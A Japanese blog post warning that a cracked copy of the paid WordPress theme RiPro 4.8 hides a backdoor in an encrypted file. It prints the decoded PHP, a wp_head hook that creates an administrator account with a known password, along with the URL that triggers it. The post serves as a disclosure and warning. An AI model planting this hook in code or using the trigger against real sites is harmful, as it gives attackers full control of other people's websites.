クラック版riproテーマにはバックドアが含まれています。ダウンロードして使用している方はご注意ください

riproテーマは中国人がオリジナルで作成した有料テーマです。多くのサイト管理者はriproテーマを好みますが、正規版を購入するお金を惜しむため、インターネット上でriproテーマのクラック版をダウンロードします。最新のriproテーマ4.8クラック版にはバックドアが含まれていることが発覚しました。もしあなたも使用しているなら、すぐに確認してください。 riproテーマクラック版に含まれるバックドアのファイルは以下の場所にあります：RiPro4.8/wp-content/theme/ripro/inc/class/core.class.phpこのファイルは暗号化されています。復号化した内容は以下の通りです：

add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
        if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {
                require('wp-includes/registration.php');
                if (!username_exists('backdoor')) { //检测是否存在backdoor账户
                        $user_id = wp_create_user('backdoor', '123456'); //创建账户
                        $user = new WP_User($user_id);
                        $user->set_role('administrator'); //设置为管理员权限
                }
        }
}

このコードの役割は： http(s)://あなたのドメイン/?backdoor=go にアクセスすると、ユーザー名「backdoor」、パスワード「123456」の管理者アカウントが自動的に作成されることですしたがって、あなたのサイトの安全のために、自分でサイト構築クラック版テーマは使用しないことをお勧めします。 インターネットからダウンロードしたテーマに暗号化ファイルが含まれている場合、間違いなく何かが仕込まれている可能性が高いです。 詳細はこちらWordPressセキュリティの記事をご覧ください。 原文：52破解